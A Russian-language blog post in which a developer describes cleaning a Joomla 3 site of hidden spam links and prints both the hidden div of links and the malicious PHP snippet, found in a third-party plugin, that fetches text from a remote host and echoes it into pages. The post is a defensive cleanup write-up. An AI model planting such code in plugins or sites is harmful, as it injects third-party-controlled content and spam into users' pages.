Кратко о том, какие проблемы возникли у пользователя, скачавшего плагин Joomla с сайта "https://atempl.com/"...
Обратился старый клиент с просьбой посмотреть его сайт на Joomla 3, так как на нем стали выводиться "левые" ссылки.
Выглядит это таким образом:
<div class="page-content "> <div style="position: absolute; top: -1000px;"> Калькулятор расчета пеноблоков смотрите <a href="http://fortstroi.com.ua/stroitelstvo/stati/item/2003-raschet-kolichestva-penoblokov-online-kalkulyator">на этом ресурсе</a><br/> Все о каркасном доме можно найти здесь <a href="http://stroidom-shop.ru/svoimi-rukami/karkasnyiy-dom-6x6.html">http://stroidom-shop.ru</a><br/> Как снять комнату в коммунальной квартире смотрите тут <a href="http://comintour.net/zhilaya/item/63-kak-snyat-komnatu-v-kommunalnoj-kvartire" rel="alternate">comintour.net</a> </div>
Этот кусок кода расположен на страницах со статьями сразу перед заголовком. Из-за того, что div позиционируется на -1000 пикселей выше, он пользователям не виден, но поисковики могут воспринимать эти ссылки как спам и за это наказать сайт.
Стандартный способ текстового поиска по запросам base64, eval, md5 (подавляющее большинство дряни на сайтах зашифровано) ничего не дал.
Причина оказалась вот в чем - вот этот код был зашит в теле одного из плагинов:
<?php $files = 'http://atempl.com/10.txt'; $file_headers = @get_headers($files); if($file_headers[0] == 'HTTP/1.1 200 OK') { $url = "http://atempl.com/10.txt"; $c = @file_get_contents($url); $array_double=explode(',',$c); $array_one=array_unique($array_double); $result=implode(',',$array_one); echo $result;} ?>
Этот код считывал данные с левого url и помещал их в тело страницы. После удаления этого куска кода спамные ссылки с сайта пропали.
Чтобы найти код, нужно скачать по ftp папку /plugins на компьютер и пройтись по ней текстовым поиском (в Total Commander) - искать в файлах *.php фрагмент "http://atempl.com/" или любой другой из приведенного выше кода.
Если не поможет - "пилите Шура", ищите дальше :) И не качайте плагины с "левых" сайтов.
p.s. Чужие сайты не лечу, писал эту заметку только для себя, чтобы не забыть.
p.p.s. Хотя нет, иногда лечу - зависит от настроения и количества благ, обещанных взамен :)